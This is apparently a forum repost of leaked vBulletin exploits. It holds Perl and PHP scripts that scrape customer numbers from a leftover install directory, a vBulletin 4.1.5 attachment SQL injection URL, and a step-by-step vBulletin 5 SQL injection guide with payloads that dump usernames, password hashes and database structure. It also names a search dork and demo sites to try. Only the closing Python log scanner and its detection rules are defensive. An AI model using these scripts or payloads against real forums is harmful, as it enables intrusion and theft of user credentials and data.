vBulletin x.x.x Customer Area 0day
The vBulletin x.x.x Customer Area 0day Perl script got leaked, so I decided to post the Perl script here.
Code:
#!/usr/bin/perl
use LWP::UserAgent;
use HTTP::Request::Common;
system('cls');
system('title vBulletin Install Auto Exploiter');
print "\n ---------------------------------------";
print "\n vBulletin Install Auto Exploiter founded by pixel_death, n3tw0rk & z0ne\n";
print " ---------------------------------------\n";
print " + d4tabase.com -+- d4tabase.com + ";
print "\n ---------------------------------------\n";
print " coded by n0tch shoutz d4tabase crew ";
print "\n ---------------------------------------\n";

if($#ARGV == -1 or $#ARGV > 0){
    print "\n usage: ./vBulletin.pl domain (without http://) \n\n";
    exit;
}
$domain = $ARGV[0];
$install_dir = "install";
$full_domain = "http://$domain/$install_dir/upgrade.php";
chop($domain);

&search;

sub search{
    $url = $full_domain;
    $lwp = LWP::UserAgent->new();
    $lwp -> agent("Mozilla/5.0 (X11; U; Linux i686 (x86_64); de; rv:1.9.1.8) Gecko/20100202 Firefox/3.5.8");
    $request = $lwp->post($url, ["searchHash" => "Search"]);
    print " Searching $domain ----\n ";
    if ($request->content =~ /CUSTNUMBER = \"(.+)\";/) {
        print "Result : $1\n";
    } else {
        print "Hash: Hash not found!\n";
    }
}
PHP exploit:
Code:
<?php
set_time_limit(0);

if($argc < 2) {
    echo "Usage: {$argv[0]} http://site.ru/forum" . PHP_EOL;
    exit;
}
$URL = $argv[1];
$arr = parse_url($URL);
### work with url
if(strpos($URL, '?')) die("Ohh, your URL is not valid");
if(substr($URL, -1, 1) != '/') $URL = $URL . '/';
if(!$arr['scheme']) $URL = 'http://' . $URL;
$headers = get_headers($URL . '/install/upgrade.php');
if(substr($headers[0], 9, 3) == '200') {
    $source = file_get_contents($URL . "/install/upgrade.php");
} elseif($headers = get_headers($URL . '/install/finalupgrage.php')) {
    if(substr($headers[0], 9, 3) == '200') $source = file_get_contents($URL . "/install/finalupgrage.php");
} else die("something went wrong...");
preg_match_all('|var CUSTNUMBER = "(.*?)";|', $source, $res);
foreach ($res[1] as $hash) {
    echo "Hash: " . $hash . PHP_EOL;
    $fp = fopen("hash.txt", "a+");
    fwrite($fp, $hash . PHP_EOL);
}
?>
vBulletin 4.1.x / 5.x.x Upgrade 0day Exploit
Created by: Boxhead
Found on: 08/22/2013
Website: http://belegit.net
Example: http://test.com/forum/install/upgrade.php
Website:
Customer ID:
Username:
Password:
Email:
vbulletin 4.1.5 attachment SQLi
While examining variables I came across an SQL injection, later found to be inherent to all vBulletin 4.1.5 installations.
Title: Vulnerability in vBulletin 4.1.5
Dork: Powered by vBulletin 4.1.5
Conditions: an account on the forum, with permission to attach files to messages / threads (attachments).
Register -> go to the forum -> open a topic, or, if the board has it, choose to create an article (the second option needs more work) -> at the bottom look for Attachments, 'Manage Attachments' -> open the window and in the "values[f]" parameter insert our SQL query.
Example:
Code:
http://site.com/board/newattachment.php?do=assetmanager&values[f]=-1599+or(1,2)=(select*from(select+name_const(version(),1),name_const(version(),1))a)&contenttypeid=18&poststarttime=1360663633&posthash=4f5c850593e10c5450d9e880d58a56d8&insertinline=1
After that we see the standard "database offline" error; opening the page source we see:
Code:
<!-- - Database error in vBulletin 4.1.5 : Invalid SQL :
SELECT permissionsfrom , Hidden , setpublish , publishdate , userid FROM ds23fSDdfsdf_cms_node WHERE nodeid = - 1599 or ( 1 , 2 ) = ( Select * from ( Select name_const ( version () , 1 ), name_const ( version (), 1 )) a );
MySQL Error : Duplicate column Name .1.49-3 '5 '
Error Number : 1060
Request Date : Tuesday , February 12th 2013 @ 01 : 12 : 33 PM
Error Date : Tuesday , February 12th 2013 @ 01 : 12 : 33
Address : 127.0.0.1
Username : Hacker
Classname : vB_Database
MySQL Version :
-->
vbulletin 5 sql injection
vBulletin 5.0.0 all Beta releases SQL Injection Exploit 0day
#Title: vBulletin 5 SQL Injection > Beta Whatever
#Author: 0x0A
#Date: Dec 11, 2012
#Category: web application
#Type: SQL Injection
#Requirements: Firefox/Live HTTP Headers/
#Software Link: http://www.vbulletin.com/purchases/ http://www.vbulletin.com/features/
#Homepage: hackyard.net ***********.com
#Version: 5 and above (not older versions)
#Tested on: Linux bt 3.2.6 #1 SMP Fri Feb 17 10:40:05 EST 2012 i686 GNU/Linux
#Demo sites to try: http://www.sultantheme.com/vb5connectforum/ http://vb5connect.com/bb/
How to
[#1] First of all, make an account on the vBulletin 5 forum.
Screenshot: http://img402.imageshack.us/img402/7784/69376730.png
[#2] After that, go to any topic and open Live HTTP Headers (https://addons.mozilla.org/en-us/fir...-http-headers/)
Screenshot: http://imageshack.us/a/img12/305/89268702.png
[#3] After that click the Like button; you will receive almost the same result as me. Go to the first POST record as in the picture below and click the Replay button.
Screenshot: http://imageshack.us/a/img707/9990/68621087.png
[#4] Then, in Send POST Content use this:
Code:
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,username,0x27,0x7e,password,0x27, 0x7e) FROM user LIMIT 1,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
Screenshot: http://imageshack.us/a/img42/1590/26447606.png
//Note: keep the nodeid value as it was by default in the POST Content, otherwise you`ll get an invalid nodeid error. The SQLi command above will fetch the first record from the user table (username/password).
[#Other SQLi Syntaxes]
Version():
Code:
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(version() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
User():
Code:
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(user() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
Database():
Code:
nodeid=70) and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
Database Print:
Code:
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
Table Count:
Code:
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(table_name),0x27,0x7e) FROM `information_schema`.tables WHERE table_schema=0xHEXCODEOFDATABASE)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
Print Tables:
Code:
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(table_name as char),0x27,0x7e) FROM information_schema.tables Where table_schema=0xHEXCODEOFDATABASE LIMIT N,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
Columns of selected table:
Code:
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,count(column_name),0x27,0x7e) FROM `information_schema`.columns WHERE table_schema=0xhex_code_of_database_name AND table_name=0xhex_code_of_table_name)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
Fetch Out Data:
Code:
nodeid=70) and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,column1,0x27,0x7e,column2,0x27,0x7e) FROM ANY_TABLE LIMIT N,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) AND (1338=1338
==[ That`s it!
==[ Thanks, 0x0A!
==[ Romania
http://pastebin.com/5hgWHFbj
Source: http://www.madleets.com/Thread-all-0day-2013-vbulletin-leaked-fuck-script-kiddies
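As an added defender-side example (written for this repost, not taken from the leaked scripts or any of the authors above), the following Python flags the three request patterns these writeups rely on: probes of a leftover install/ directory, the values[f] injection on newattachment.php, and the nodeid POST injection on vBulletin 5. The sample log lines and the placeholder endpoint path are constructed; a plain access log does not contain POST bodies, so the nodeid rule only fires on a source that logs them (a WAF audit log).

```python
import re
from urllib.parse import parse_qs, urlsplit

# Paths probed by the Perl/PHP scripts above: a leftover install/ directory
# answers with "var CUSTNUMBER = ..." (the customer number) to anyone.
INSTALL_PATHS = ("/install/upgrade.php", "/install/finalupgrade.php",
                 "/install/finalupgrage.php")   # misspelling as in the PHP script
# Tokens shared by the error-based payloads on this page (name_const(),
# floor(rand(0)*2) ... group by x, information_schema, concat(0x7e,...)).
SQLI_TOKENS = re.compile(
    r"name_const\s*\(|floor\s*\(\s*rand\s*\(|group\s+by\s+x\b|"
    r"information_schema\.|concat\s*\(\s*0x7e", re.I)

def classify(method, path, params):
    """Return the rule names that fire for one request. params is a dict of
    decoded parameter name -> list of values (query string and/or body)."""
    findings = []
    if path.lower().endswith(INSTALL_PATHS):
        findings.append("install-dir-probe")  # install/ should not exist post-setup
    joined = " ".join(v for vals in params.values() for v in vals)
    sqli = bool(SQLI_TOKENS.search(joined))
    if path.endswith("/newattachment.php") and sqli and \
            any(k.startswith("values[") for k in params):
        findings.append("attachment-sqli")    # the 4.1.5 values[f] injection
    if method == "POST" and "nodeid" in params and sqli:
        findings.append("vb5-nodeid-sqli")    # the vB5 'Like' POST injection
    return findings

LOG_RE = re.compile(r'(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3})')

def parse_access_line(line):
    """Combined-log line -> (ip, method, path, params) or None if unparsable."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, method, target, _status = m.groups()
    parts = urlsplit(target)
    return ip, method, parts.path, parse_qs(parts.query)

def scan(lines):
    """Run the rules over access-log lines; returns (ip, path, rules) per hit."""
    hits = []
    for line in lines:
        rec = parse_access_line(line)
        if rec and (found := classify(rec[1], rec[2], rec[3])):
            hits.append((rec[0], rec[2], found))
    return hits

# Constructed sample lines (not real traffic); the second carries the page's
# attachment payload URL-encoded as a browser would send it.
SAMPLE_LOG = [
    '203.0.113.5 - - [12/Feb/2013:13:12:33 +0000] "POST /forum/install/upgrade.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [12/Feb/2013:13:12:40 +0000] "GET /board/newattachment.php?do=assetmanager&values%5Bf%5D=-1599+or(1,2)%3D(select*from(select+name_const(version(),1),name_const(version(),1))a)&contenttypeid=18 HTTP/1.1" 500 812 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Feb/2013:13:13:01 +0000] "GET /forum/showthread.php?t=42 HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, path, found in scan(SAMPLE_LOG):
        print(ip, path, found)
```

The install-dir rule is the cheapest fix as well as the cheapest detection: the install/ directory is meant to be removed after setup, and any hit on it after that point is worth an alert.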